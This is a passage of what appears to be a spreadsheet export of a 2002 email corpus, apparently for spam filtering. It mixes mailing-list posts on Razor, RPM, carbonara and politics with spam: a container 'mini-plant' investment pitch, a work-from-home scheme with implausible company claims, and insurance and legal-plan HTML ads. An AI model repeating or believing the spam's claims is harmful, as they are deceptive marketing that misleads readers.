 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;B&gt;Production Mini-plants in mobile containers. Co-investment Program&lt;/B&gt;&lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;BR&gt;
 &lt;BR&gt;
 =22...Science Network will supply to countries and developing regions the technology and the necessary support for the production in series of Mini-plants in mobile containers (40-foot). The Mini-plant system is designed in such a way that all the production machinery is fixed on the platform of the container, with all wiring, piping, and installation parts; that is to say, they are fully equipped... and the mini-plant is ready for production.=22&lt;BR&gt;
 &lt;BR&gt;
 More than 700 portable production systems: Bakeries, Steel Nails, Welding Electrodes, Tire Retreading, Reinforcement Bar Bending for Construction Framework, Sheeting for Roofing, Ceilings and Fa&amp;ccedil;ades, Plated Drums, Aluminum Buckets, Injected Polypropylene Housewares, Pressed Melamine Items (Glasses, Cups, Plates, Mugs, etc.), Mufflers, Construction Electrically Welded Mesh, Plastic Bags and Packaging, Mobile units of medical assistance, Sanitary Material, Hypodermic Syringes, Hemostatic Clamps, etc. &lt;BR&gt;
 &lt;BR&gt;
 Science Network has started a process of Co-investment for the installation of small Assembly plants to manufacture in series the Mini-plants of portable production on the site, region or country where they may be required. One of the most relevant features is the fact that these plants will be connected to the World Trade System (WTS) with access to more than 50 million raw materials, products and services and automatic transactions for world trade.&lt;BR&gt;
 &lt;BR&gt;
 Because of financial reasons, involving cost and social impact, the right thing to do is to set up assembly plants in the same countries and regions, using local resources (labor, some equipment, etc.)&lt;BR&gt;
 &lt;BR&gt;
 For more information: &lt;a href=3D=22mailto:reports=40the-financial-news.com=22&gt;Mini-plants in mobile containers&lt;/a&gt;&lt;BR&gt;
 &lt;BR&gt;
 By Steven P. Leibacher, The Financial News, Editor&lt;BR&gt;
 &lt;BR&gt;
 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;B&gt;&lt;BR&gt;
 Mini-plantas de produccion en contenedores moviles. Programa de Co-inversion&lt;BR&gt;
 &lt;BR&gt;
 &lt;/B&gt;&lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;=22...Science Network s&lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;FONT COLOR=3D=22=23000000=22&gt;uministrara a paises y regiones en vias de desarrollo la tecnologia y el apoyo necesario para la fabricacion en serie de Mini-plantas de produccion en contenedores moviles (40-foot)&lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;. El sistema de mini-plantas esta dise&amp;ntilde;ado de forma que todas las maquinas de produccion van instaladas fijas sobre la propia plataforma del contenedor, con el cableado, tuberias e instalaciones; es decir, completamente equipadas... y a partir de ese momento est&amp;aacute;n listas para producir.=22 &lt;BR&gt;
 &lt;BR&gt;
 Mas de 700 sistemas de produccion portatil: Panaderias, Producci&amp;oacute;n de clavos de acero, Electrodos para soldadura, Recauchutado de neumaticos, Curvado de hierro para armaduras de construccion, Lamina perfilada para cubiertas, techos y cerramientos de fachada, Bidones de chapa, Cubos de aluminio, Menaje de polipropileno inyectado, Piezas de melamina prensada (vasos, platos, tazas, cafeteras, etc.) Silenciadores para vehiculos, Malla electrosoldada para la construccion, Bolsas y envases de plastico, Unidades moviles de asistencia medica, Material sanitario (jeringas hipodermicas, Pinzas hemostaticas, etc.)&lt;BR&gt;
 &lt;BR&gt;
 Science Network ha puesto en marcha un proceso de Co-inversion para la instalacion de peque&amp;ntilde;as Plantas ensambladoras para fabricar en serie las Mini-plantas de produccion portatil, en el lugar, region o pais que lo necesite. Una de las caracter&amp;iacute;sticas relevantes es el hecho de que dichas plantas quedaran conectadas al Sistema del Comercio Mundial (WTS) con acceso a mas de 50 millones de mercancias, materia primas, productos, servicios y las operaciones automaticas de comercio internacional. &lt;BR&gt;
 &lt;BR&gt;
 Resulta obvio que por razones economicas, de costes y de impacto social, lo apropiado es instalar plantas ensambladoras en los mismos paises y regiones asi como utilizar los recursos locales (mano de obra, ciertos equipamientos, etc.)&lt;BR&gt;
 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;FONT COLOR=3D=22=23000000=22&gt;&lt;BR&gt;
 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;Para recibir mas infromacion: &lt;a href=3D=22mailto:reports=40the-financial-news.com=22&gt;Mini-plantas de produccion en contenedores moviles&lt;/a&gt;&lt;BR&gt;
 &lt;BR&gt;
 Steven P. Leibacher, The Financial News, Editor&lt;BR&gt;
 &lt;BR&gt;
 -------------------------------------------------------------------------&lt;BR&gt;
 If you received this in error or would like to be removed from our list, please return us indicating: remove or un-subscribe in 'subject' field, Thanks. &lt;a href=3D=22mailto:newsletters=40the-financial-news.com=22&gt; Editor&lt;/a&gt;&lt;BR&gt;
 &amp;copy; 2002 The Financial News. All rights reserved.&lt;BR&gt;
 &lt;FONT SIZE=3D2&gt;&lt;FONT FACE=3D=22Arial=22&gt;&lt;FONT SIZE=3D2&gt;&lt;FONT COLOR=3D=22=23000000=22&gt;&lt;BR&gt;
 &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
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 --=_NextPart_2rfkindysadvnqw3nerasdf--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] What's wrong with the Razor servers now?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Who loses in this case? Why? Neither party is inaccurate in their
 &gt; actions IMO. But someone's standing is going to get hurt because of it.
 My question for the trust system is this. I signed up for a free account 
 on some website that gives me free access to a large compilation of data, 
 and in so doing have subscribed myself to their mailing list. The mailing 
 includes a list of new articles and books and so forth as well as a few 
 links to their book store.
 This is consistently flagged as spam, even though I *agreed* to see it, 
 and I *want* to see what new articles there are, since some of them might 
 be interesting. Thus, since it is certifiably *not* spam (it even 
 includes a link to terminate your account), I revoke it. Even so, the 
 next mail is still flagged as spam.
 Who is losing a trust rating here? If it is not unsolicited commercial e-
 mail, it should not be reported by Razor as spam -- correct?
 --Will
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Hanson's Sept 11 message in the National Review
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 19 Sep 2002, Bill Stoddard wrote:
 --]How likely are you to change someone's mind by being
 --]rude and disrespectful to them? Is this how to win friends and influence
 --]people?
 Point the first, I doubt if they are trying to change Rumsy's mind but
 rather to show others that there is a vocal and violent opposition to his
 views. With such flagrant showings of opposition there would be more
 coverage of the opposing ideas and thus the spreading of the dissenting
 meme. A viri need not comply with the wishes of the attacked host, rather
 the host had better make some antibodies or learn to adapt.
 Point the second. Historicaly the "in yer face" mode of confrontation has
 been used to gain popular support and to grow from seeds "grass roots"
 movements. Witness the big bold "in yer face" signature of Hancock on the
 "in yer  face" Declaration of the american colonies to the governing
 powers of england. Witness also the chicago seven, Others will follow in
 examplare  form upon digging.
 Now point the third, is it annoying? Yes, and if your annoyed then the "in
 yer facers" have done thier job. Sad to say the polite persnikiters are
 teh very fule the "in yer facers" hope to ignite. If your burning, your
 being used.
 Pointed the personal...The politics of the polite are more often the
 refuge of backstabings,  closed mouth recourlessness and hypocritcal
 behavoirs. Id rather hear what those who oppose me have to say than
 quietly be knifed by the slow hand of the coward.
 Seek not the polite or impolite but rather the reasons why.
 -tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] removing Razor1
</t>
  </si>
  <si>
    <t xml:space="preserve">Forgive me for being a partially stupid end-user of this fantastic
 spam fighting software.
 I was looking at my spamd debug output today, and noticed that it ran
 through Razor2 stuff, and then it ran through dccproc, and then it tried to
 go through old Razor1 stuff.  I'm assuming (and please correct me if I'm
 wrong) that Razor1 is out dated and was to be replaced entirely by Razor2.
 If that's the case, can someone please point me to something that explains
 how to remove Razor1 from my system?  I don't see a point in envoking it.
 Especially when it appears to error out on me.
 debug: Razor1 is available
 debug: entering helper-app run mode
 debug: Razor Agents 1.19, protocol version 2.
 debug: 170803 seconds before closest server discovery
 debug: Agent terminated
 Problem while trying to load Razor1: Permission denied  at
 /usr/local/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/Dns.pm line 288.
 debug: leaving helper-app run mode
 Thanks!
 -- 
 Josh Hildebrand          Email: josh@jedi.net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</si>
  <si>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Defending Unliked Speech
</t>
  </si>
  <si>
    <t xml:space="preserve">Gordon Mohr quoted:
 &gt;# French Writer Tried As Anti-Islam, Protest Erupts
 &gt;# By Caroline Brothers
 &gt;#
 &gt;# PARIS (Reuters) - Provocative French novelist Michel Houellebecq
 &gt;# faced a Paris court on Tuesday for allegedly inciting racial hatred
 &gt;# by calling Islam "the stupidest religion" and its holy book the
 &gt;# Koran a depressing read.
 &gt;#
 &gt;# The case, brought against him by four Muslim groups, is a cause
 &gt;# celebre reminiscent of the Salman Rushdie affair, pitting freedom of
 &gt;# expression against religious sensitivities.
 Very reminiscent indeed.  Ayatollah Chirac has decreed a death
 sentence on Houellebecq and liked-minded fundamentalists have offered
 millions of euros bounty for his head, so he has gone into hiding
 under police protection for a few years.
 Or maybe some handful of Muslims are acting uppity and dragging him to
 court under "hate speech" laws make a point about people not showin'
 dem da massive respect dat dey deserve, especially these days.
 Or maybe some journo is trying to fill column inches on a boring day.
 BTW I read Houellebecq's "Extension du domaine de la lutte" recently,
 about a depressed computer services dude working in Paris, looking for
 love and not finding it, slowing losing his marbles and trying to get
 a friend of his to kill a woman, and ending up in a clinic for
 nutcases...  Yikes!  Purposely provocative, very depressing, with some
 unbelievably boring passages where the anti-hero writes little stories
 about animals talking philosophical mumbo-jumbo to each other, quoted
 inline in full for pages on end.
 It starts out:
 "On Friday evening, I was invited to a party with some colleagues from
 work.  There were about thrity of us, all professionals aged from
 twenty-five to forty.  At one point, some cunt started getting
 undressed. She took off her T-shirt, then her bra, then her skirt, all
 the while making unbelievable faces.  She pranced around for a few
 seconds, then she started getting dresesd again because she didn't
 know what else to do.  Anyway she never sleeps with anyone.  Which
 underlines the absurdity of her behaviour.
 After my fourth glass of vodka I started to feel pretty bad so I had
 to go lie down on a bunch of cushions behind the couch.  Shortly after
 that, two girls came and sat on the couch.  Those girls are not pretty
 at all, the two fat office cows actually.  They go to eat together and
 read books about the development of language in children, all that
 sort of stuff."
 ... and it's downhill from there!
 R
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Nothing like mama used to make
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;  in adding cream to spaghetti carbonara, which has the same effect on pasta as
 &gt;  making a pizza a deep-pie; 
 I just had to jump in here as Carbonara is one of my favourites to make and ask 
 what the hell are you supposed to use instead of cream?  I've never seen a 
 recipe that hasn't used this.  Personally I use low fat creme fraiche because it 
 works quite nicely but the only time I've seen an supposedly authentic recipe 
 for carbonara  it was identical to mine (cream, eggs and lots of fresh parmesan) 
 except for the creme fraiche.
 Stew
 -- 
 Stewart Smith
 Scottish Microelectronics Centre, University of Edinburgh.
 http://www.ee.ed.ac.uk/~sxs/
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: work from home. free info
</t>
  </si>
  <si>
    <t xml:space="preserve">WE NEED HELP.  We are a 14 year old fortune 500 company, and we have 
 grown 1000%!  We cannot keep up.  We are looking for individuals who 
 want to work at home, and make a good living.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.lotsonet.com/opportunity
 and fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.
 NO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO
 ONLY.
 http://www.lotsonet.com/opportunity
 You want to be independent?  THEN MAKE IT HAPPEN!
 HAPPEN!
 SIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!
 GUARANTEED!
 http://www.lotsonet.com/opportunity
 To be removed from our link simple go to:
 http://www.lotsonet.com/opportunity/remove.html
 4171uCAC8-021gCco3337qYKc4-050NVjZ1161Zl37
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: British National Health Service to provide vibrators to women
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8394718,1717/
 Date: 2002-09-30T14:13:10+01:00
 (Some Dysfunctional Woman)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Prob. w/ install/uninstall
</t>
  </si>
  <si>
    <t xml:space="preserve">hey i have a problem:
 i have a rpms that i have installed that i want to uninstall, i do it
 like so:
 rpm -e [rpm package]
 and it gives the error: package not installed, so i install it like
 so:
 rpm -i [rpm package]
 and it gives the error: package already installed, so i force it to
 install like so:
 rpm -i --force [rpm package]
 this installs it and then i try to uninstall it again and it still
 gives me the same error: package not installed.
 How can i get it to recognize that the package is indeed installed it,
 and/or get it to unstall it?
 Thanx in advance,
 Brian French
 -French
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tate unveils its biggest work
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8688972,215/
 Date: 2002-10-09T03:15:19+01:00
 At 155 metres, Anish Kapoor's sculpture is one of the world's largest.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: PROTECT YOUR FAMILY'S FUTURE and Save up to 70%
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;ReliaQuote - Save Up To 70% On Life Insurance&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" link="#FFFFFF" vlink="#FFFFFF" alink="#FFCC00"&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
 &lt;table width="454" border="0" cellspacing="0" cellpadding="0" height="500" bgcolor="#FFFFFF"&gt;
   &lt;tr&gt; 
     &lt;td align="left" valign="top" height="2" width="49%"&gt; 
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="3"&gt;
         &lt;tr&gt; 
           &lt;td&gt;&lt;a href="http://www.reliaquote.com/termlife/default.asp?sourceid=39200000022000000338" target="_blank"&gt;&lt;img src="http://www.reliaquote.com/banner/bannerads/images/rqlogo12.jpg" width="186" height="50" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
     &lt;td align="left" valign="top" height="357" rowspan="2" width="51%"&gt; 
       &lt;table width="100%" border="0" cellspacing="5" cellpadding="0"&gt;
         &lt;tr align="center" valign="middle"&gt; 
           &lt;td&gt;&lt;img src="http://www.reliaquote.com/banner/bannerads/images/70percent12.gif" width="220" height="134"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align="center" valign="top"&gt; 
           &lt;td height="264"&gt; 
             &lt;table border="0" cellspacing="1" cellpadding="2" width="220" bgcolor="#990000"&gt;
               &lt;tr bgcolor="#CC6666"&gt; 
                 &lt;td align="center" colspan="5"&gt;&lt;font face="Times New Roman,Arial" color="#ffc65a" size="2"&gt;&lt;b&gt;&lt;font face="Tahoma, Verdana, Arial" color="#FFFFFF"&gt;10-Year 
                   Level &lt;br&gt;
                   Term Life Insurance&lt;/font&gt;&lt;font face="Tahoma, Verdana, Arial" color="#CCCCFF"&gt;&lt;br&gt;
                   &lt;/font&gt;&lt;/b&gt;&lt;font face="Tahoma, Verdana, Arial" color="#000000" size="1"&gt;Male/Female 
                   Monthly Premiums&lt;br&gt;
                   No Nicotine&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr bgcolor="#990000"&gt; 
                 &lt;td width="33" height="15"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td align="center" colspan="2" height="15"&gt;&lt;font face="Tahoma, Verdana, Arial" size="2" color="#FFFFFF"&gt;&lt;b&gt;$250,000&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td align="center" colspan="2" height="15"&gt;&lt;font face="Tahoma, Verdana, Arial" size="2" color="#FFFFFF"&gt;&lt;b&gt;$500,000&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr valign="middle" bgcolor="#FFFFFF"&gt; 
                 &lt;td width="33" align="center"&gt;&lt;font color="#663366" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;Age&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="50" align="center"&gt;&lt;font color="#663366" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;Male&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="54" align="center"&gt;&lt;font color="#663366" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;Female&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="55" align="center"&gt;&lt;font color="#663366" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;Male&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="38" align="center"&gt;&lt;font color="#663366" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;Female&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr valign="middle" bgcolor="#990000"&gt; 
                 &lt;td width="33" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;35&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="50" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;$10.33&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="54" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;$9.19&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="55" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;$16.19&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="38" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;$14.00&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr valign="middle" bgcolor="#FFFFFF"&gt; 
                 &lt;td width="33" align="center"&gt;&lt;b&gt;&lt;font face="Tahoma, Verdana, Arial" size="1" color="#000000"&gt;40&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width="50" align="center"&gt;&lt;b&gt;&lt;font face="Tahoma, Verdana, Arial" size="1" color="#000000"&gt;$13.30&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width="54" align="center"&gt;&lt;b&gt;&lt;font face="Tahoma, Verdana, Arial" size="1" color="#000000"&gt;$11.64&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width="55" align="center"&gt;&lt;b&gt;&lt;font face="Tahoma, Verdana, Arial" size="1" color="#000000"&gt;$22.32&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width="38" align="center"&gt;&lt;b&gt;&lt;font face="Tahoma, Verdana, Arial" size="1" color="#000000"&gt;$18.82&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr valign="middle" bgcolor="#990000"&gt; 
                 &lt;td width="33" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;45&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="50" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;$19.43&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="54" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;$16.63&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="55" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;$35.57&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="38" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;$22.88&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr valign="middle" bgcolor="#FFFFFF"&gt; 
                 &lt;td width="33" align="center"&gt;&lt;b&gt;&lt;font face="Tahoma, Verdana, Arial" size="1" color="#000000"&gt;50&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width="50" align="center"&gt;&lt;b&gt;&lt;font face="Tahoma, Verdana, Arial" size="1" color="#000000"&gt;$29.49&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width="54" align="center"&gt;&lt;b&gt;&lt;font face="Tahoma, Verdana, Arial" size="1" color="#000000"&gt;$22.32&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width="55" align="center"&gt;&lt;b&gt;&lt;font face="Tahoma, Verdana, Arial" size="1" color="#000000"&gt;$54.69&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width="38" align="center"&gt;&lt;b&gt;&lt;font face="Tahoma, Verdana, Arial" size="1" color="#000000"&gt;$40.25&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr valign="middle" bgcolor="#990000"&gt; 
                 &lt;td width="33" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;55&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="50" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;$44.89&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="54" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;$32.12&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="55" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;$85.32&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="38" align="center"&gt;&lt;font color="#FFFFFF" face="Tahoma, Verdana, Arial" size="1"&gt;&lt;b&gt;$59.94&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;div align="center"&gt;&lt;img src="http://www.reliaquote.com/banner/bannerads/images/legal12.gif" width="100" height="16" alt="Sample rates underwritten by First Colony Life Insurance Company. Term life insurance subject to the terms of Policy Form nos. 1420 (96) et al and 1421 et al which includes an exclusion period of death by suicide. Premiums include a $50 annual policy fee. No nicotine use includes use of all nicotine and nicotine substitutes. Subject to state availability and issue limitations. Based on premiums paid monthly. Rates are higher for other underwriting classifications. ReliaQuote Inc. is a licensed insurance agency dba ReliaQuote Insurance Services in CA, license #0C16621. "&gt;&lt;br&gt;
               &lt;br&gt;
               &lt;a href="http://www.reliaquote.com/termlife/default.asp?sourceid=39200000022000000338" target="_blank"&gt;&lt;img src="http://www.reliaquote.com/banner/bannerads/images/clickhere12.gif" width="168" height="44" border="0"&gt;&lt;/a&gt; 
               &lt;font face="Tahoma, Verdana, Arial" size="1" color="#6666CC"&gt;&lt;br&gt;
               &lt;font color="#333300"&gt;&lt;br&gt;
               &lt;/font&gt;&lt;font face="Tahoma, Verdana, Arial" size="1" color="#6666CC"&gt;&lt;font color="#990000"&gt;&amp;copy; 
               2002 ReliaQuote. All Rights Reserved&lt;/font&gt;&lt;/font&gt; &lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td align="left" valign="top" width="49%" height="355"&gt; 
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt; 
           &lt;td height="10"&gt;&lt;img src="http://www.reliaquote.com/banner/bannerads/images/headline12.gif" width="220" height="77"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align="center" valign="middle"&gt; 
           &lt;td&gt;&lt;img src="http://www.reliaquote.com/banner/bannerads/images/photo12.jpg" width="220" height="145"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align="center"&gt; 
           &lt;td&gt; 
             &lt;table width="100%" border="0" cellspacing="8" cellpadding="0"&gt;
               &lt;tr&gt; 
                 &lt;td height="148"&gt;&lt;font size="3" face="Tahoma, Verdana, Arial"&gt;Life 
                   can change in an instant. Don't wait until it's too late. Give 
                   your family the security they deserve today with affordable 
                   term life insurance from ReliaQuote.&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;p align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;To unsubscribe from our
 mailing list, please &lt;/font&gt;&lt;a href="http://onlineoffers.7a6a.net/onlineoffers/unsubscribe.asp?id=jm@netnoteinc.com"&gt;&lt;font color="#000000" face="Arial, Helvetica, sans-serif" size="1"&gt;Click
 Here&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Holidays for freshrpms.net :-)
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,
 I'll be leaving this evening until next Monday, with no access to
 whatsoever to a single computer until then, woohoo, real holidays! :-)
 So don't be worried if there's a new release of &lt;insert your favorite
 freshrpms package here&gt; and that it's not updated quickly despite your many
 requests to the list ;-)
 Before going, I did repackage the latest hackedbox and lbreakout2 that both
 came out today.
 Have fun! (I will!!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</si>
  <si>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TOP Legal advice.. for PENNIES a day!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;HEAD&gt;&lt;TITLE&gt;Prepaid Legal Special&lt;/TITLE&gt;
 &lt;META charset=3DUTF-8&gt;&lt;/HEAD&gt;
 &lt;BODY background=3D""&gt;&lt;FONT color=3D#000000 face=3DArial&gt;
 &lt;TABLE border=3D1 borderColorDark=3D#e0e0e0 cellPadding=3D1 cellSpacing=3D=
 0 frame=3Dbox rules=3Dgroups style=3D"BACKGROUND-COLOR: #e0e0e0; FONT-SIZE=
 : x-small" width=3D"100%"&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=3D#e0e0e0 color=3D"#000000"&gt;
 &lt;TR align=3Dleft bgColor=3D#e0e0e0 color=3D"#000000"&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;/STYLE&gt;
 &lt;META content=3D"MSHTML 5.50.4807.2300" name=3DGENERATOR&gt;
 &lt;DIV align=3Dcenter&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;TABLE bgColor=3D#0033ff cellPadding=3D0 cellSpacing=3D3 width=3D600&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;TABLE bgColor=3D#71a5cc cellPadding=3D0 cellSpacing=3D0 width=3D600&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=3D#71a5cc&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD align=3Dmiddle bgColor=3D#71a5cc&gt;&lt;FONT color=3Dwhite face=3Darial,helv=
 etica&gt;&lt;B&gt;&lt;BR&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;font size=3D"5"&gt;
 How would you like a Top Rated Law Firm working for you, &lt;br&gt;
 your family and your business for only pennies a day? &lt;br&gt;&lt;br&gt;
 GET YOUR &lt;a href=3D"http://www.severoffer.com/whatif/"&gt;FREE QUOTE&lt;/a&gt;&lt;BR&gt;
 &lt;font size=3D"3"&gt;(Takes only 30 seconds!)
 &lt;BR&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD bgColor=3D#71a5cc&gt;&lt;BR&gt;
 &lt;UL&gt;&lt;FONT color=3Dwhite face=3Darial,helvetica&gt;&lt;font size=3D"4"&gt;&lt;center&gt;
